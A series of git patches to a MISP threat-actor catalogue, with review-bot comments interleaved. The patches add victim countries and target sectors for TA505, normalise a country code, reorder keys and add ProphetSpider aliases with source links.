+ "uuid": "3b238f3a-c67a-4a9e-b474-dc3897e00129",
 "value": "Scattered Spider"
 }
 ],
From 89ab7728b02839d5df41e056eec639936d7ac868 Mon Sep 17 00:00:00 2001
From: jstnk9
Date: Tue, 3 Oct 2023 12:44:44 +0200
Subject: [PATCH 13/16] updated TA505 countries and industries affected
updated TA505 countries and industries affected
---
 clusters/threat-actor.json | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 5d1f1c7..9caddb0 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -7106,6 +7106,31 @@
 "ATK103",
 "Hive0065",
 "CHIMBORAZO"
+ ],
+ "cfr-target-category": [
+ "Education",
+ "Finance",
+ "Health",
+ "Retail",
+ "Hospitality"
+ ],
+ "cfr-suspected-victims": [
+ "Australia",
+ "Canada",
+ "Czech Republic",
+ "Germany",
+ "Hungary",
+ "India",
+ "Japan",
+ "Romania",
+ "Serbia",
+ "Singapore",
+ "South Korea",
+ "Spain",
+ "Thailand",
+ "Turkey",
+ "United Kingdom",
+ "United States"
 ]
 },
 "related": [
From ce7d54c96af95b75a458e18f48a1aa1c0b5d56e4 Mon Sep 17 00:00:00 2001
From: Paul Stark
Date: Tue, 3 Oct 2023 11:56:45 -0400
Subject: [PATCH 14/16] chg [misp-galaxy] update Nigeria from name to 2-digit code
---
 clusters/threat-actor.json | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 5d1f1c7..d0e530d 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
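Review bot: The new `cfr-target-category` and `cfr-suspected-victims` arrays for TA505 arrive without a source: nothing is added to the entry's `refs` and the commit body only restates the title, so a reader cannot tell which report the sixteen countries and five sectors were taken from. Victimology is the kind of claim analysts act on, so the originating report should be added to `refs` in the same change, or at least cited in the commit message. The arrays are also inserted after `synonyms`, out of the file's sorted key order; running the project's jq formatter before committing would avoid the reordering churn that a later commit in this series performs.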
@@ -11770,7 +11770,7 @@
 {
 "description": "When the first member of Scattered Canary, who, for the purposes of this report, we call\nAlpha, began his operations, he was a lone wolf—working mostly Craigslist scams as he learned\nthe tricks of the trade from a mentor. However, within a few years, he had honed his craft\nenough to expand into romance scams, where he met his first “employee,” Beta. Once they\nhad secured enough mules via their romance scams to launder their stolen money, they shifted\nfrom targeting individuals to targeting enterprises, and the group’s BEC operation was born.",
 "meta": {
- "country": "Nigeria",
+ "country": "NG",
 "motive": "Cybercrime",
 "references": [
 "https://cofense.com/blog/gift-card-fraud-ecosystem-shifts-what-paxfuls-closing-means-for-business-email-compromise/",
From 89a193d315b2c5132419cbcb03d33778f6cb5bb5 Mon Sep 17 00:00:00 2001
From: Alexandre Dulaunoy
Date: Wed, 4 Oct 2023 10:48:44 +0200
Subject: [PATCH 15/16] fix: [threat-actor] version updated + jq all the things
---
 clusters/threat-actor.json | 52 +++++++++++++++++++------------------
 1 file changed, 26 insertions(+), 26 deletions(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index 9caddb0..b202344 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -7074,6 +7074,31 @@
 {
 "description": "TA505, the name given by Proofpoint, has been in the cybercrime business for at least four years. This is the group behind the infamous Dridex banking trojan and Locky ransomware, delivered through malicious email campaigns via Necurs botnet. Other malware associated with TA505 include Philadelphia and GlobeImposter ransomware families.",
 "meta": {
+ "cfr-suspected-victims": [
+ "Australia",
+ "Canada",
+ "Czech Republic",
+ "Germany",
+ "Hungary",
+ "India",
+ "Japan",
+ "Romania",
+ "Serbia",
+ "Singapore",
+ "South Korea",
+ "Spain",
+ "Thailand",
+ "Turkey",
+ "United Kingdom",
+ "United States"
+ ],
+ "cfr-target-category": [
+ "Education",
+ "Finance",
+ "Health",
+ "Retail",
+ "Hospitality"
+ ],
 "country": "RU",
 "refs": [
 "https://www.bleepingcomputer.com/news/security/ta505-group-adopts-new-servhelper-backdoor-and-flawedgrace-rat/",
@@ -7106,31 +7131,6 @@
 "ATK103",
 "Hive0065",
 "CHIMBORAZO"
- ],
- "cfr-target-category": [
- "Education",
- "Finance",
- "Health",
- "Retail",
- "Hospitality"
- ],
- "cfr-suspected-victims": [
- "Australia",
- "Canada",
- "Czech Republic",
- "Germany",
- "Hungary",
- "India",
- "Japan",
- "Romania",
- "Serbia",
- "Singapore",
- "South Korea",
- "Spain",
- "Thailand",
- "Turkey",
- "United Kingdom",
- "United States"
 ]
 },
 "related": [
@@ -11824,5 +11824,5 @@
 "value": "Scattered Spider"
 }
 ],
- "version": 283
+ "version": 284
 }
From 1b33cad11dfb1ee562528afe34a46ceb6a5cd4d8 Mon Sep 17 00:00:00 2001
From: Daniel Plohmann
Date: Wed, 4 Oct 2023 16:39:01 +0100
Subject: [PATCH 16/16] adding aliases to ProphetSpider
---
 clusters/threat-actor.json | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/clusters/threat-actor.json b/clusters/threat-actor.json
index fb10ee4..f7856ac 100644
--- a/clusters/threat-actor.json
+++ b/clusters/threat-actor.json
@@ -11489,7 +11489,13 @@
 "country": "",
 "references": [
 "https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
- "https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/"
+ "https://www.crowdstrike.com/blog/prophet-spider-exploits-citrix-sharefile/",
+ "https://www.secureworks.com/research/gold-melody-profile-of-an-initial-access-broker",
+ "https://www.mandiant.com/resources/blog/unc961-multiverse-financially-motivated"
+ ],
+ "synonyms": [
+ "GOLD MELODY",
+ "UNC961"
 ]
 },
 "related": [
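Review bot: The context line `"country": "",` directly above the added synonyms is an empty-string placeholder, the same pattern this series deletes from the Scattered Spider entry in commit 10; an unknown attribution should omit the key rather than leave `""`, which consumers may treat as a real value. While touching this entry it would be consistent to drop that line. Adding `GOLD MELODY` and `UNC961` together with the Secureworks and Mandiant reports that define them is the right shape — each alias arrives with its primary source.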